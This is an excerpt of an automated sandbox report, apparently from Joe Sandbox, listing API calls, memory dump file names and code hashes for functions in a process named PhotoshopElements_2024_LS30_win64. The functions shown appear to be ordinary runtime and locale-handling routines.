                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0052153B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                        • String ID:
                                                                                                        • API String ID: 3906539128-0
                                                                                                        • Opcode ID: b84f5377e7108cf01bb2251bff6472f62e16fc40e01806e2b68ad9497d6c8fc5
                                                                                                        • Instruction ID: bf106f155dcc7561494c2ff3bb37a5701d9756067c191a0eb8c64a8da5be34f5
                                                                                                        • Opcode Fuzzy Hash: b84f5377e7108cf01bb2251bff6472f62e16fc40e01806e2b68ad9497d6c8fc5
                                                                                                        • Instruction Fuzzy Hash: 6931D274901229ABCF21DF69D9897CDBBB8BF59310F5041EAE40CA6290E7749F858F44
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(?,?,005311C4,?,00000000,?,?,?,0053C9D9), ref: 005311E7
                                                                                                        • TerminateProcess.KERNEL32(00000000,?,005311C4,?,00000000,?,?,?,0053C9D9), ref: 005311EE
                                                                                                        • ExitProcess.KERNEL32 ref: 00531200
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 1703294689-0
                                                                                                        • Opcode ID: 12f760cd992b790e3ba001a84b57e67040712691bcc430b014a8ff0377ec1ef4
                                                                                                        • Instruction ID: 33aaba58218e463f3337d1a7d1e5f259b57dd102abfd161cdb5e472dc419cc4e
                                                                                                        • Opcode Fuzzy Hash: 12f760cd992b790e3ba001a84b57e67040712691bcc430b014a8ff0377ec1ef4
                                                                                                        • Instruction Fuzzy Hash: 8DE08C31000649EFCF116F28CC0EA893F29FB56341F004414FA05C6531CB75EC81EB50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d343b2740a6acd67858a7f242a0350f6b49f9fe32836a3dadb58b1a9f3dee321
                                                                                                        • Instruction ID: d46d9f6a5e5c9471c6f155b05f1c5753053f7a5fe7bba80224ceb4d299163316
                                                                                                        • Opcode Fuzzy Hash: d343b2740a6acd67858a7f242a0350f6b49f9fe32836a3dadb58b1a9f3dee321
                                                                                                        • Instruction Fuzzy Hash: 4BF16171E052299FDF14CFA8D8806AEBBF1FF89314F158269E819A7381D730AD01CB94
                                                                                                        Strings
                                                                                                        • 0123456789ABCDEFabcdef-+XxPp, xrefs: 0028998D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                        • String ID: 0123456789ABCDEFabcdef-+XxPp
                                                                                                        • API String ID: 593203224-3606100449
                                                                                                        • Opcode ID: 73355174f2697e3652da35dbc81635ec8254b09110087e3231022f12e03c0884
                                                                                                        • Instruction ID: 3123ce485ea6566f50507ebe2ffd61988bb77dab4ce7b0080f8217ab83964e4c
                                                                                                        • Opcode Fuzzy Hash: 73355174f2697e3652da35dbc81635ec8254b09110087e3231022f12e03c0884
                                                                                                        • Instruction Fuzzy Hash: 23C2AF38626246CFEB25DF28C440BA9BBF1BF16304F28419ED4958B2D2D776DC96CB11
                                                                                                        APIs
                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005393B3,?,?,00000008,?,?,005454C4,00000000), ref: 005395E5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionRaise
                                                                                                        • String ID:
                                                                                                        • API String ID: 3997070919-0
                                                                                                        • Opcode ID: fed23b86c169c7d727d185859ee075ba00bdf57a0e1a9102a6e3bf4c8b4a8bf1
                                                                                                        • Instruction ID: 9a4cc91b194ade1047b04ace08ac6ce7e582266603fbb02aebbc9d50ca42657b
                                                                                                        • Opcode Fuzzy Hash: fed23b86c169c7d727d185859ee075ba00bdf57a0e1a9102a6e3bf4c8b4a8bf1
                                                                                                        • Instruction Fuzzy Hash: 28B13BB1610609DFDB15CF28C48AB657FE0FF45364F258658E89ACF2A1C375E992CB40
                                                                                                        APIs
                                                                                                          • Part of subcall function 00536413: GetLastError.KERNEL32(00000002,00000000,00000006,0051DC92,00000000,00000000,00000002,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 00536418
                                                                                                          • Part of subcall function 00536413: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 005364B6
                                                                                                          • Part of subcall function 00536413: _free.LIBCMT ref: 00536475
                                                                                                          • Part of subcall function 00536413: _free.LIBCMT ref: 005364AB
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005417D3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast_free$InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2003897158-0
                                                                                                        • Opcode ID: 4ff0307aeb69386da22fd21e88c10ce830a85f31a6dc52cf0be03b051fc06f4f
                                                                                                        • Instruction ID: 3c38dbf7fce3cacc27463ca3cfbfbca7bece1c7d19a80984d5015754d49c3892
                                                                                                        • Opcode Fuzzy Hash: 4ff0307aeb69386da22fd21e88c10ce830a85f31a6dc52cf0be03b051fc06f4f
                                                                                                        • Instruction Fuzzy Hash: CE21C132910607ABEF289E64DC55AFA3BACFF44304F14007AF901C6141EB35AD84C758
                                                                                                        APIs
                                                                                                          • Part of subcall function 00536413: GetLastError.KERNEL32(00000002,00000000,00000006,0051DC92,00000000,00000000,00000002,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 00536418
                                                                                                          • Part of subcall function 00536413: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 005364B6
                                                                                                        • EnumSystemLocalesW.KERNEL32(0054152C,00000001,00000000,?,?,?,00541B5A,00000000,?,?,?), ref: 00541478
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 2417226690-0
                                                                                                        • Opcode ID: b8d718cd8565e2ff502b4e9bddc7ee384ae6366d4f6a8770b8c3dc88855bb1e7
                                                                                                        • Instruction ID: 605a907720f19aea523087762e77440ddda892d0f2f0a313f82d044c6b0f1af7
                                                                                                        • Opcode Fuzzy Hash: b8d718cd8565e2ff502b4e9bddc7ee384ae6366d4f6a8770b8c3dc88855bb1e7
                                                                                                        • Instruction Fuzzy Hash: 0511C23A604B055FDF189F3998916FABF92FB8035CB14442CE94787A40E771A982CB44
                                                                                                        APIs
                                                                                                          • Part of subcall function 00536413: GetLastError.KERNEL32(00000002,00000000,00000006,0051DC92,00000000,00000000,00000002,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 00536418
                                                                                                          • Part of subcall function 00536413: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 005364B6
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00541829,00000000,00000000,?), ref: 005419D7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 3736152602-0
                                                                                                        • Opcode ID: ec51d4b6e41590afd00c1f48f419194657735cf9115a3a25266af54614e2ca03
                                                                                                        • Instruction ID: 1c1a30b83c1b3d15f7b33827e6cc98efcac19f5625c080cdd883ab856a4cd30e
                                                                                                        • Opcode Fuzzy Hash: ec51d4b6e41590afd00c1f48f419194657735cf9115a3a25266af54614e2ca03
                                                                                                        • Instruction Fuzzy Hash: 4CF0A932A015127BDF285B6588057FA7F54FB80758F154429EC46B3140EA74FD82C6D4
                                                                                                        APIs
                                                                                                          • Part of subcall function 00536413: GetLastError.KERNEL32(00000002,00000000,00000006,0051DC92,00000000,00000000,00000002,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 00536418
                                                                                                          • Part of subcall function 00536413: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 005364B6
                                                                                                          • Part of subcall function 00536413: _free.LIBCMT ref: 00536475
                                                                                                          • Part of subcall function 00536413: _free.LIBCMT ref: 005364AB
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00541368
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast_free$InfoLocale
                                                                                                        • String ID: Z$utf8
                                                                                                        • API String ID: 2003897158-2328135999
                                                                                                        • Opcode ID: 0e4c10755c5fc58a1121cd1c6566cae2d7d2cc1e95abcd1d59e8e6beb6b58476
                                                                                                        • Instruction ID: 8b8461fcf9568ebeb2fa06b4a8b5f9ca8acb738282873111935be8495a554877
                                                                                                        • Opcode Fuzzy Hash: 0e4c10755c5fc58a1121cd1c6566cae2d7d2cc1e95abcd1d59e8e6beb6b58476
                                                                                                        • Instruction Fuzzy Hash: 31F02832A10106ABDB14AF74DC4AAFA37E8FF85314F00417DF506D7281EA74AD458750
                                                                                                        APIs
                                                                                                          • Part of subcall function 00536413: GetLastError.KERNEL32(00000002,00000000,00000006,0051DC92,00000000,00000000,00000002,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 00536418
                                                                                                          • Part of subcall function 00536413: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 005364B6
                                                                                                        • EnumSystemLocalesW.KERNEL32(0054177F,00000001,?,?,?,?,00541B1E,?,?,?,?), ref: 005414EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 2417226690-0
                                                                                                        • Opcode ID: 268604521921050ddb68c1a196d732d75f075e1ba685a020b36ca2cb58ffb8d8
                                                                                                        • Instruction ID: b9a00f3704991f747fffec7359d7d8421e0c9b4c1de17bd2822364bb42460af8
                                                                                                        • Opcode Fuzzy Hash: 268604521921050ddb68c1a196d732d75f075e1ba685a020b36ca2cb58ffb8d8
                                                                                                        • Instruction Fuzzy Hash: 6DF022362007052FCB249F3898C5AAA7FA1FB8036CF14802CF9024B680D6B1AC82CA08
                                                                                                        APIs
                                                                                                          • Part of subcall function 005325B9: RtlEnterCriticalSection.NTDLL(-006B1850), ref: 005325C8
                                                                                                        • EnumSystemLocalesW.KERNEL32(005379CA,00000001,0069F6F0,0000000C,00537E35,00000000), ref: 00537A0F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1272433827-0
                                                                                                        • Opcode ID: 3358fdfd858c93653d0d469a2a2559559b2a040dda81c6440e65831af724e690
                                                                                                        • Instruction ID: 9f7b7a4ee20b83662818f06ee2e5f8f64c16cce0c9d9b0020cbd43189583a52e
                                                                                                        • Opcode Fuzzy Hash: 3358fdfd858c93653d0d469a2a2559559b2a040dda81c6440e65831af724e690
                                                                                                        • Instruction Fuzzy Hash: 9BF01972A04205AFDB10EF98E84AB987BF1FB49721F10411AF5009B2A0DB755940CF40
                                                                                                        APIs
                                                                                                          • Part of subcall function 00536413: GetLastError.KERNEL32(00000002,00000000,00000006,0051DC92,00000000,00000000,00000002,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 00536418
                                                                                                          • Part of subcall function 00536413: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 005364B6
                                                                                                        • EnumSystemLocalesW.KERNEL32(00541314,00000001,?,?,?,00541B7C,?,?,?,?), ref: 005413F2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 2417226690-0
                                                                                                        • Opcode ID: 343cc98c2ca922cdf9aeff4074764bcc571743dfa0f944a1fa1083ba42f8b67f
                                                                                                        • Instruction ID: 43eff5dfba834a2541e06f0dc32ed841e14ce188bf07b52c909b392af17b456e
                                                                                                        • Opcode Fuzzy Hash: 343cc98c2ca922cdf9aeff4074764bcc571743dfa0f944a1fa1083ba42f8b67f
                                                                                                        • Instruction Fuzzy Hash: F6F0E53670020567CF149F3AD846AAA7F94FFC1754F064058EA058BA90D7719882C794
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,?,?,?,?,005358CB,?,20001004,00000000,00000002), ref: 00537FC4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2299586839-0
                                                                                                        • Opcode ID: b0aa25490f2f135433871e20f45f2f40c28060b7390aae5a13631d33783f8b16
                                                                                                        • Instruction ID: 9c9679bebe210e2818ec0bb5f737b9810cd2bb96b8342bbf68a704a6a83bb7cd
                                                                                                        • Opcode Fuzzy Hash: b0aa25490f2f135433871e20f45f2f40c28060b7390aae5a13631d33783f8b16
                                                                                                        • Instruction Fuzzy Hash: F9E04F7190421DBFCF226F60DC09EAE7F16FF59751F054411FD0566120CB368921AAD0
                                                                                                        Memory Dump Source
